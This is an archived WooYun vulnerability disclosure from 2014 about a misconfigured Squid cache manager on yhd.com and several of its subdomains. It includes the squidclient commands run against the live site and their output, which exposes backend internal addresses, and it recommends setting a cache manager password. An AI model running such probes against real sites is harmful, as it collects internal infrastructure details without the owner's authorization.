乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-08: 细节已通知厂商并且等待厂商处理中 2014-12-10: 厂商已经确认,细节仅向厂商公开 2014-12-20: 细节向核心白帽子及相关领域专家公开 2014-12-30: 细节向普通白帽子公开 2015-01-09: 细节向实习白帽子公开 2015-01-22: 细节向公众公开
1号店主站及对多个分站某服务配置不当
1号店主站及对多个分站 squid ACL配置当导致信息泄露,以站为例。
dodo@dodo:~$ squidclient -h www.yhd.com -p 80 mgr:HTTP/1.1 200 OKServer: squid/2.7.STABLE9-YHD0.8.1Date: Mon, 08 Dec 2014 05:21:20 GMTContent-Type: text/plainExpires: Mon, 08 Dec 2014 05:21:20 GMTX-Cache: MISS from yhd_homepage_4_2_170X-Cache-Lookup: MISS from yhd_homepage_4_2_170:80Connection: close mem Memory Utilization public cbdata Callback Data Registry Contents public events Event Queue public squidaio_counts Async IO Function Counters public coss COSS Stats public diskd DISKD Stats public config Current Squid Configuration hidden ipcache IP Cache Stats and Contents public fqdncache FQDN Cache Stats and Contents public idns Internal DNS Statistics public url_rewriter URL Rewriter Stats public store_rewriter URL Rewriter Stats public external_acl External ACL stats public http_headers HTTP Header Statistics public menu This Cachemanager Menu public ##注意这个!##shutdown Shut Down the Squid Process hidden reconfigure Reconfigure the Squid Process hidden offline_toggle Toggle offline_mode setting hidden info General Runtime Information public filedescriptors Process Filedescriptor Allocation public objects All Cache Objects public vm_objects In-Memory and In-Transit Objects public openfd_objects Objects with Swapout files open public pending_objects Objects being retreived from the network public client_objects Objects being sent to clients public io Server-side network read() size histograms public counters Traffic and Resource Counters public peer_select Peer Selection Algorithms public digest_stats Cache Digest and ICP blob public 5min 5 Minute Average of Counters public 60min 60 Minute Average of Counters public utilization Cache Utilization public histograms Full Histogram Counts public active_requests Client-side Active Requests public store_digest Store Digest public storedir Store Directory Stats public store_check_cachable_stats storeCheckCachable() Stats public store_io Store IO Interface Stats public pconn Persistent Connection Utilization Histograms public refresh Refresh Algorithm Statistics public delay Delay Pool Levels public forward Request Forwarding Statistics public client_list Cache Client List public asndb AS Number Database public server_list Peer Cache Statistics public non_peers List of Unknown sites sending ICP messages public
存在问题的站点还有:s.yhd.comcms.yhd.comt.yhd.com3c.yhd.comfood.yhd.comchannel.yhd.combaobao.yhd.com
~$ squidclient -h www.yhd.com -p 80 mgr:server_listHTTP/1.1 200 OKServer: squid/2.7.STABLE9-YHD0.8.1Date: Mon, 08 Dec 2014 05:22:45 GMTContent-Type: text/plainExpires: Mon, 08 Dec 2014 05:22:45 GMTX-Cache: MISS from yhd_homepage_4_1_166X-Cache-Lookup: MISS from yhd_homepage_4_1_166:80Connection: closeParent : wwwHost : 10.x.x.191/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.191Status : UpAVG RTT : 0 msecOPEN CONNS : 0FETCHES : 24920018 0%IGNORED : 0 0%Last failed connect() at: 07/Dec/2014:02:30:01 +0800DOMAIN LIST: www.yhd.com keep-alive ratio: 0%Parent : xxxxxxxxxxxxxxxxHost : 10.x.x.191/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.191Status : UpAVG RTT : 0 msecOPEN CONNS : 2FETCHES : 24930195 0%IGNORED : 0 0%Last failed connect() at: 08/Dec/2014:10:04:23 +0800DOMAIN LIST: www.yhd.com keep-alive ratio: 0%Parent : xxxxxxxxxxHost : 10.x.x.191/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.191Status : UpAVG RTT : 0 msecOPEN CONNS : 2FETCHES : 24932905 0%IGNORED : 0 0%Last failed connect() at: 08/Dec/2014:09:10:01 +0800DOMAIN LIST: www.yhd.com keep-alive ratio: 0%Parent : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxHost : 10.x.x.192/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.192Status : UpAVG RTT : 0 msecOPEN CONNS : 0FETCHES : 1006 0%IGNORED : 0 0%DOMAIN LIST: xxxxxxxx.yhd.com keep-alive ratio: 0%Parent : xxxxxxxxxxxxx1Host : 10.x.x.192/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.192Status : UpAVG RTT : 0 msecOPEN CONNS : 0FETCHES : 2410 0%IGNORED : 0 0%DOMAIN LIST: xxxxxxxxxxkeep-alive ratio: 0%Parent : xHost : 10.x.x.192/80/0Flags : no-query round-robin originserverAddress[0] : 10.x.x.192Status : UpAVG RTT : 0 msecOPEN CONNS : 0FETCHES : 6148 0%IGNORED : 0 0%Last failed connect() at: 20/Nov/2014:10:43:27 +0800DOMAIN LIST: xxxxxxxxxxxxxxkeep-alive ratio: 0%
cachemgr_passwd password_here all
危害等级:低
漏洞Rank:3
确认时间:2014-12-10 10:23
谢谢
暂无